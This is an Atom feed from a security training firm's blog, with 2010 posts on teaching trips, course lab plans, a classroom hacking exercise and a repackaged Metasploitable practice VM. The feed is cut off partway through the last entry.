<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-6339171303043697983</id><updated>2011-11-27T17:04:14.303-08:00</updated><category term='Russ McRee'/><category term='Firewalls'/><category term='Windows XP'/><category term='Brad Antoniewicz'/><category term='Brian Wilson'/><category term='The Last HOPE'/><category term='tools'/><category term='Risk Management'/><category term='pingtunnel'/><category term='ARP'/><category term='vboxdrv'/><category term='alfa'/><category term='blackhat'/><category term='penetration testing'/><category term='remote shell'/><category term='MIT-MAGIC-COOKIE'/><category term='Blackhat DC 2008'/><category term='Chris Gates'/><category term='Securing Linux'/><category term='ircd-hybrid'/><category term='VPN'/><category term='mysqlfast'/><category term='backtrack'/><category term='dsniff'/><category term='Honolulu'/><category term='OWASP'/><category term='ISSA Journal'/><category term='Metasploit Framework'/><category term='infosec'/><category term='voipong'/><category term='breach notification'/><category term='PEAP'/><category term='Hackin9'/><category term='precedent'/><category term='Josh Wright'/><category term='VBoxManage'/><category term='MD5'/><category term='Burger King'/><category term='nic'/><category term='rootkits'/><category term='AWUS036H'/><category term='training'/><category term='snort'/><category term='Auditing E-Commerce'/><category term='Sunbelt'/><category term='NoVAH'/><category term='uuid'/><category term='mysql'/><category term='mitm'/><category term='Starbucks'/><category term='wifi'/><category term='Paraben'/><category term='security assessments'/><category term='security'/><category term='Securix-NSM'/><category term='Wireshark'/><category term='Joe McCray'/><category term='information'/><category term='script kiddies'/><category term='IS317'/><category term='ntp'/><category term='unhash'/><category term='IPTables'/><category term='Ubuntu 10.04'/><category term='choicepoint'/><category term='Department of Justice'/><category term='cybercrime'/><category term='vmdk'/><category term='citrix'/><category term='Security Workshop'/><category term='welcome'/><category term='tutorials'/><category term='WebGoat'/><category term='Rootwars'/><category term='FTC'/><category term='dns'/><category term='eggdrop'/><category term='Afterglow'/><category term='tcpreplay'/><category term='ssl'/><category term='IT controls'/><category term='Sguil'/><category term='epic'/><category term='defcon'/><category term='Beltsville'/><category term='Father&apos;s Day'/><category term='OpenSSH'/><category term='nvidia'/><category term='vista'/><category term='pfSense'/><category term='examples'/><category term='sipera'/><category term='Department of Energy'/><category term='legislation'/><category term='Opensolaris'/><category term='fuzzing'/><category term='SPIKE'/><category term='tcpdump'/><category term='X11 cookie'/><category term='SHA1'/><category term='Kurt Grutzmacher'/><category term='trojans'/><category term='Cain'/><category term='server impersonation'/><category term='Greenbelt'/><category term='wardriving'/><category term='social'/><category term='sip'/><category term='illlegal'/><category term='nforce'/><category term='Argus'/><category term='Firewall'/><category term='incident handling'/><category term='ITT'/><category term='warrantless'/><category term='CEH'/><category term='Cisco ASA'/><category term='Joshua Wright'/><category term='tun/tap'/><category term='Seattle'/><category term='Roothack.org'/><category term='Black Hat USA 2008'/><category term='Midnight Research Labs'/><category term='Offensive Security'/><category term='Rick Farina'/><category term='registry hack'/><category term='IRC'/><category term='ECSA'/><category term='backdoors'/><category term='DefCon 16'/><category term='Backtrack 4'/><category term='DC'/><category term='Mac OSX'/><category term='SSH xauth'/><category term='Mobile Security Training Lab'/><category term='linux'/><category term='Baltimore'/><category term='Redhat'/><category term='IGS'/><category term='research'/><category term='CHFI'/><category term='iodine'/><category term='honeywall'/><category term='Steve Adegbite'/><category term='poc'/><category term='meet'/><category term='cell phone'/><category term='Abel'/><category term='Hawaii'/><category term='syslog'/><category term='AirTight'/><category term='SAINT'/><category term='DefCon CTF'/><category term='audit'/><category term='seizure'/><category term='john the ripper'/><category term='LearnSecurityOnline'/><category term='sipvicious'/><category term='sandro gauci'/><category term='Metasploitable'/><category term='Shmoocon'/><category term='ms-sql'/><category term='variable change'/><category term='Maryland'/><category term='802.11'/><category term='cve'/><category term='dkms'/><category term='gcc'/><category term='Virtualbox'/><category term='LPT'/><category term='Intrusion Detection'/><category term='lab'/><category term='US'/><category term='NSMWiki'/><category term='batch file'/><category term='netcat'/><category term='VOIP'/><category term='Detroit'/><title type='text'>IRON::Guard Security</title><subtitle type='html'>IRON::Guard Security, LLC is a full-service information security consulting firm. Our Professional Services range from Penetration Testing, Vulnerability Assessments, Audits/Compliance - GRC, Incident Response, Managed Security Services, Physical Threat Assessments, Training Services and DR/Business Continuity Planning.</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://blog.ironguard.net/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>62</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-848797594780723845</id><published>2010-08-15T02:36:00.000-07:00</published><updated>2010-08-15T02:37:42.491-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='LPT'/><category scheme='http://www.blogger.com/atom/ns#' term='ECSA'/><title type='text'>On the way back home</title><content type='html'>&lt;span style="font-family: Verdana,sans-serif; font-size: small;"&gt;The trip is over and was definitely a success, sitting in BWI airport about to catch the first thing smoking back to Seattle via Air Tran. Time to fly home for another month until its time to head back to Maryland to do a ECSA/LPT training course.&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-848797594780723845?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/848797594780723845/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=848797594780723845&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/848797594780723845'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/848797594780723845'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2010/08/on-way-back-home.html' title='On the way back home'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-1898034647552746494</id><published>2010-08-10T05:34:00.000-07:00</published><updated>2010-08-10T05:34:01.096-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='DefCon CTF'/><category scheme='http://www.blogger.com/atom/ns#' term='NoVAH'/><title type='text'>NoVA Hackers</title><content type='html'>http://novahackers.blogspot.com/&lt;br /&gt;&lt;br /&gt;I had the pleasure of attending a meeting last night.&amp;nbsp; Its these kind of events that make me wish that I lived on this side of the country sometimes.&amp;nbsp; The format is mostly 'lightning talks' but they were very informative and the atmosphere was relaxed.&amp;nbsp; The second best part to me was the talk about the recent DefCon CTF event and how some NoVA members participated (they didn't come in last by the way! ;)).&amp;nbsp; They shared their trials and tribulations preparing for the event, qualifying and subsequently competing.&amp;nbsp; Really nice stuff, I hope that they post their slide deck online.&lt;br /&gt;&lt;br /&gt;The best part was being able to see CG and get caught up with him a bit, its been too long.&amp;nbsp; Hopefully we will be able to do dinner or something like that before I head back to Seattle on Sunday.&lt;br /&gt;&lt;br /&gt;May Your Skill Prevail.&lt;br /&gt;&lt;input id="gwProxy" type="hidden" /&gt;&lt;br /&gt;&lt;input id="gwProxy" type="hidden" /&gt;&lt;br /&gt;&lt;input id="gwProxy" type="hidden" /&gt;&lt;!--Session data--&gt;&lt;input id="jsProxy" onclick="if(typeof(jsCall)=='function'){jsCall();}else{setTimeout('jsCall()',500);}" type="hidden" /&gt;&lt;br /&gt;&lt;div id="refHTML"&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-1898034647552746494?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/1898034647552746494/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=1898034647552746494&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/1898034647552746494'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/1898034647552746494'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2010/08/nova-hackers.html' title='NoVA Hackers'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-532624621946267212</id><published>2010-08-10T05:25:00.000-07:00</published><updated>2010-08-10T05:25:13.890-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='LPT'/><category scheme='http://www.blogger.com/atom/ns#' term='ECSA'/><category scheme='http://www.blogger.com/atom/ns#' term='variable change'/><category scheme='http://www.blogger.com/atom/ns#' term='Maryland'/><category scheme='http://www.blogger.com/atom/ns#' term='Hawaii'/><title type='text'>Training Tornado Dying Down</title><content type='html'>Three weeks of training across the United States (Washington State to Maryland, Maryland to Hawaii, Hawaii to Maryland and Maryland to Seattle) is coming to a close.&amp;nbsp; I'm spending the last week hanging out with a very close friend (surrogate younger brother!).&amp;nbsp; It turns out that I'll be returning to Greenbelt, Maryland next month to do an ECSA\LPT 5 day boot camp in a month.&lt;br /&gt;&lt;br /&gt;Over the last month I have learned that it truly pays to account for 'variable change' especially when delivering custom content and that I'm not nearly as infallible as I thought. ;)&amp;nbsp; Its best not to put all of your eggs in one basket and works more smoothly when you distribute them in layered fashion to prepare for the inevitable snag in your game plan. &amp;nbsp; Its all part of a never ending learning process though and I plan on using what I've learned to improve the things that do.&amp;nbsp; &lt;br /&gt;&lt;br /&gt;Until next time.&lt;br /&gt;&lt;br /&gt;&lt;input id="gwProxy" type="hidden" /&gt;&lt;!--Session data--&gt;&lt;input id="jsProxy" onclick="if(typeof(jsCall)=='function'){jsCall();}else{setTimeout('jsCall()',500);}" type="hidden" /&gt;&lt;div id="refHTML"&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-532624621946267212?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/532624621946267212/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=532624621946267212&amp;isPopup=true' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/532624621946267212'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/532624621946267212'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2010/08/training-tornado-dying-down.html' title='Training Tornado Dying Down'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-321713997939987780</id><published>2010-07-13T15:42:00.000-07:00</published><updated>2010-07-17T15:13:29.290-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='VPN'/><category scheme='http://www.blogger.com/atom/ns#' term='Risk Management'/><category scheme='http://www.blogger.com/atom/ns#' term='pfSense'/><category scheme='http://www.blogger.com/atom/ns#' term='Firewalls'/><category scheme='http://www.blogger.com/atom/ns#' term='Auditing E-Commerce'/><category scheme='http://www.blogger.com/atom/ns#' term='IPTables'/><category scheme='http://www.blogger.com/atom/ns#' term='Wireshark'/><category scheme='http://www.blogger.com/atom/ns#' term='Securing Linux'/><category scheme='http://www.blogger.com/atom/ns#' term='WebGoat'/><category scheme='http://www.blogger.com/atom/ns#' term='Cisco ASA'/><category scheme='http://www.blogger.com/atom/ns#' term='OpenSSH'/><category scheme='http://www.blogger.com/atom/ns#' term='Intrusion Detection'/><title type='text'>Lab - o - Matic!</title><content type='html'>&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Have you been wondering where I have been hiding all this time?&amp;nbsp; Well, providing labs for four classes and two info-sec workshops will make time for blog posting sparse.&amp;nbsp; &lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;IS 315 Risk Management and Intrusion Detection: Wireshark Labs to cover the basics and core protocols (TCP,UDP, IP, ICMP, ARP, etc.) and special projects to build a Snort IDS and discuss sensor placement and risk management concerning the deployment.&amp;nbsp; Plans are to author snort signatures towards the end of the quarter if time permits.&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;IS 418 Securing Linux Platforms and Applications:&amp;nbsp; Some basic labs to brush up on Linux accounts and permissions did an IPTables to review firewalling.&amp;nbsp; Building on all this teaching SELinux...we have been covering the basics and tacking a few of the concepts, particularly MCS&amp;nbsp; and MLS models.&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;IS 316 Firewalls &amp;amp; VPNs: Started with IPTables and BASH shell scripting around that to automate the process.&amp;nbsp; Currently working on Packet Filtering and using OpenSSH Layer 3 VPNs.&amp;nbsp; Will graduate to pfSense (firewall, proxy and VPN) and possibly using the Cisco ASA as a firewall/VPN platform.&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;span style="font-family: Verdana,sans-serif; font-size: small;"&gt;IS 413 Auditing E-Commerce and&amp;nbsp; Network System Implementation: The students have already had policy and auditing courses including another one the evening before.&amp;nbsp; We are using WebGoat and Damn Vulnerable Web App to learn about many of the web application risks that are out there.&amp;nbsp; Towards the end of the quarter we will investigate the audit trails and discuss writing strong policy around these issues.&lt;/span&gt;&lt;br /&gt;&lt;input id="gwProxy" type="hidden" /&gt;&lt;!--Session data--&gt;&lt;input id="jsProxy" onclick="if(typeof(jsCall)=='function'){jsCall();}else{setTimeout('jsCall()',500);}" type="hidden" /&gt;&lt;div id="refHTML"&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-321713997939987780?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/321713997939987780/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=321713997939987780&amp;isPopup=true' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/321713997939987780'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/321713997939987780'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2010/07/lab-o-matic.html' title='Lab - o - Matic!'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-2099837414562793103</id><published>2010-07-13T15:08:00.000-07:00</published><updated>2010-07-13T15:08:27.927-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Honolulu'/><category scheme='http://www.blogger.com/atom/ns#' term='training'/><category scheme='http://www.blogger.com/atom/ns#' term='Greenbelt'/><category scheme='http://www.blogger.com/atom/ns#' term='CEH'/><category scheme='http://www.blogger.com/atom/ns#' term='Maryland'/><category scheme='http://www.blogger.com/atom/ns#' term='Hawaii'/><category scheme='http://www.blogger.com/atom/ns#' term='CHFI'/><title type='text'>On a Training Run</title><content type='html'>&lt;span style="font-family: Verdana,sans-serif; font-size: small;"&gt;Headed to Greenbelt MD for a week to teach a CEH class, then over to Honolulu HI for a week to teach a CEH class then back to Greenbelt for a&amp;nbsp; week long CHFI class.&amp;nbsp; I suppose after that I will be allowed to return home! ;)&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-2099837414562793103?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/2099837414562793103/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=2099837414562793103&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/2099837414562793103'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/2099837414562793103'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2010/07/on-training-run.html' title='On a Training Run'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-5135003563011462325</id><published>2010-06-13T19:35:00.000-07:00</published><updated>2010-06-13T19:39:42.545-07:00</updated><title type='text'>Back to Business</title><content type='html'>&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Unfortunately my two week hiatus that is also known as a vacation is coming to a close.&amp;nbsp; As I will be back to providing training, I'm sure that I will be posting relevant material here.&amp;nbsp; Do I sound excited to be going back to work? No?&amp;nbsp; Really?&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-5135003563011462325?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/5135003563011462325/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=5135003563011462325&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/5135003563011462325'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/5135003563011462325'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2010/06/back-to-business.html' title='Back to Business'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-6960332569953157821</id><published>2010-06-13T19:33:00.001-07:00</published><updated>2010-06-13T19:40:03.076-07:00</updated><title type='text'>Updated Design Template</title><content type='html'>&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;This should be pretty self explanatory and I hope that everyone likes it better than the previous ones.&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-6960332569953157821?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/6960332569953157821/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=6960332569953157821&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/6960332569953157821'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/6960332569953157821'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2010/06/updated-design-template.html' title='Updated Design Template'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-5252136775667098042</id><published>2010-05-20T23:36:00.000-07:00</published><updated>2010-06-13T19:40:27.061-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Virtualbox'/><category scheme='http://www.blogger.com/atom/ns#' term='SHA1'/><category scheme='http://www.blogger.com/atom/ns#' term='MD5'/><category scheme='http://www.blogger.com/atom/ns#' term='Metasploitable'/><title type='text'>Metasploitable == Virtualbox</title><content type='html'>&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Last night I put together a Metasploitable Virtualbox appliance.&amp;nbsp; It includes the readme.txt provided by the MSF team as well as the .mf file has been deleted (all these manifest files ever do it make it take 5 times longer to import appliances and they fail half of the time).&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;You can scoop up the appliance at:&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;a href="http://www.ironguard.net/msf/metasploitable.tar.gz"&gt;http://www.ironguard.net/msf/metasploitable.tar.gz&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;581,840KB&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt; MD5: fa7d8304af40e1127dd690ad0159b5dc&amp;nbsp; metasploitable.tar.gz&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;SHA1:&amp;nbsp; 1080f8389c1115cbdca1ce6cd5e910d4201e0bc8&amp;nbsp; metasploitable.tar.gz&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;RIPEMD160: b0c089861ca727439abc650de7bbb74243aa4b56&amp;nbsp; metasploitable.tar.gz &lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Enjoy!&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-5252136775667098042?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/5252136775667098042/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=5252136775667098042&amp;isPopup=true' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/5252136775667098042'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/5252136775667098042'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2010/05/metasploitable-virtualbox.html' title='Metasploitable == Virtualbox'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-8322265957918974666</id><published>2010-05-19T21:04:00.000-07:00</published><updated>2010-06-13T19:40:43.386-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Rootwars'/><category scheme='http://www.blogger.com/atom/ns#' term='netcat'/><title type='text'>RootWars - Day Three</title><content type='html'>&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Well, it would appear that we have a winner!  Team One was able to obtain root access again and Team Two decided to just stay in a holding pattern until we wrapped things up for the evening.  Understandably there was a great deal of frustration coming from Team Two.  As time progresses it is my hope that the frustration resides and they can look back on it as a positive learning experience and that after a debriefing next week and an exchange of whitepapers both teams will have learned more about information security on Linux platforms.  Among the skills displayed were some custom shell scripts, knowledge of shutting down unnecessary services, examination of backdoor source code as well as traditional talents such port scanning, netcat manipulation, etc. &lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;All in all it was a good learning experience, I'll have to figure out ways in the future to make it different and exciting for disparate skill levels.  Until next time.&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;May Your Skill Prevail.&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-8322265957918974666?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/8322265957918974666/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=8322265957918974666&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/8322265957918974666'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/8322265957918974666'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2010/05/rootwars-day-three.html' title='RootWars - Day Three'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-6121208819424534249</id><published>2010-05-19T20:56:00.000-07:00</published><updated>2010-06-13T19:41:03.805-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Metasploit Framework'/><category scheme='http://www.blogger.com/atom/ns#' term='Metasploitable'/><title type='text'>Metasploitable</title><content type='html'>&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Looks like the guys over at Metasploit have a new addition to the family....&lt;a href="http://blog.metasploit.com/2010/05/introducing-metasploitable.html"&gt;Metasploitable&lt;/a&gt;.  An Ubnutu Linux based distribution with built in vulnerabilities so that one can test the Metasploit Framework and learn how to use some of its functionality.&lt;br /&gt;&lt;br /&gt;Many thanks for the creation of another useful and valuable tool!&lt;br /&gt;&lt;br /&gt;May Your Skill Prevail.&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-6121208819424534249?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/6121208819424534249/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=6121208819424534249&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' 